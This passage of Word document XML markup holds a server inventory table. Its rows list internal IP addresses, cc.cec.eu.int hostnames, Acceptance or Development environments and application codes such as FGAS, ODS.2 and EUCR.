              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.181.163</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5027E3B9" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03823.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="25581882"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3FB10712" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="946" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05692133" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FGAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D2B44F8"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03B99C60" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0C7E8310" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.142.217</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C76A14D" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd01904.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1E16F26C"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715EDEFD" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="946" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F9D943B" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FGAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B4C933F"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0114D2D5" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="02B0C31B" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.180.135</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52398713" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03818.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="03FFBA73"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04A09064" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="946" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ED0122A" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>ODS.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5593D3"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59EEDE2B" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="16E8EC4E" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.141.218</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00BE2549" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd01771.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="19A9224C"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0895855C"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6B29C32E" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C31B4B8"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1272E2EC" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3BCE03F8" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.141.66</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="697B0D98" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd02776.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="30C56B84"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20BA84FE"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2E8CB62D" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FGAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6735B523"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7BE3D365" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5C783E17" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.181.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BF2E7B4" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03815.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="00AF94B9"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6AE936C0"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0FE650C6" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>ODS.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11B58609"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06EEA5ED" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6E31B882" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.176.116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="048045F2" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03088.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="48080BFC"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77C0AFCA"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3624D224" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D9E8F5D"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302D5AD5" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0C601EFC" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.137.147</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E9171A0" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd02057.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0CC0FD4A"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62C1C484"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3E9CE47A" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23F60512"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0EE4CDFB" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5702684E" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.142.187</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12686AC1" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd01754.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4AD42F9A"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4932F758"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4347C0FD" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI.CHL-VALIDATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32C37178"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275F9982" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7ABED14C" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.177.142</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05705CE1" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03452.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="42A7D86A"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3C262895"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1EEFC04F" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EB16AEB"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70714866" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1990C581" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.176.152</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61F59EF5" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03451.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="449" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="26E00694"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7B6932FB" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="946" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DD5B183" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="003F4055">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A079879"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7E7265E6" w14:textId="77777777" w:rsidTr="003F4055">
        <w:tc>
          <w:tcPr>
